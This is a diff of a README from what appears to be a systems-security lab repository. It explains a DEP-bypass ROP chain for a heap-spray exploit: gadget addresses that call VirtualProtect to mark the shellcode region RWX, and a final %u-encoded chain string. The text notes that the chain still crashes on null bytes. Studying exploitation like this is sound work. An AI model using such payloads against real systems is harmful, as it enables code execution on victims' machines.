pwilthew/Systems-Security/Heap-Spray-DEP/README.md

 *Note that the shellcode address used in this block can only be determined after step #5 and #6.
 I was using 0x41414141 for testing purposes until I found a realiable address for my shellcode.*
 ```
 %u4242%u4242 Any bytes                        (0x42424242) *
 %u4cc1%u7c34 pop eax; ret                     (0x7C344cc1)
 %ua158%u7c37 Virtual Protect Stub             (0x7C37A158)
 %u64bf%u7c35 call dword ptr [eax-18h] ; ret   (0x7C3564BF)
 %u2208%u0808 parameter 1: Shellcode Address   (0x08082208)
 %u4000%u0000 parameter 2: Size of region      (0x00004000)
 %u0040%u0000 parameter 3: Protection Bits RWX (0x00000040)
-%u0a0a%u0a0a parameter 4: Old protection value(0x0a0a0a0a) [Any writable]
+%u0a0a%u0a0a parameter 4: Old protection value(0x0a0a0a0a) [Or any writable]
 %u2208%u0808 Shellcode Address                (0x08082208) **

-	* Due to the Standard calling convention, after “ret,” ESP register does not directly point to the next word of Saved EIP.
+* Due to the Standard calling convention, after “ret,” ESP register does not directly
+point to the next word of Saved EIP.
-The callee function cleans local variable; thus ESP will point to right after the function parameters on the stack.
+The callee function cleans local variable; thus ESP will point to right after the function
+parameters on the stack.
 Which is why we can use any bytes as the beggining of the ROP chain.

 ** Return from previos gadget (as its page is executable, shellcode will proceed to run)
 ```

+The final ROP chain looks as follows:
 ```%u4242%u4242%u4cc1%u7c34%ua158%u7c37%u64bf%u7c35%u2208%u0808%u0040%u0000%u4000%u0000%u0a0a%u0a0a%u2208%u0808```

 Now, the problem with these ROP chain is that it contains null bytes and the program crashes when it is running the gadgets.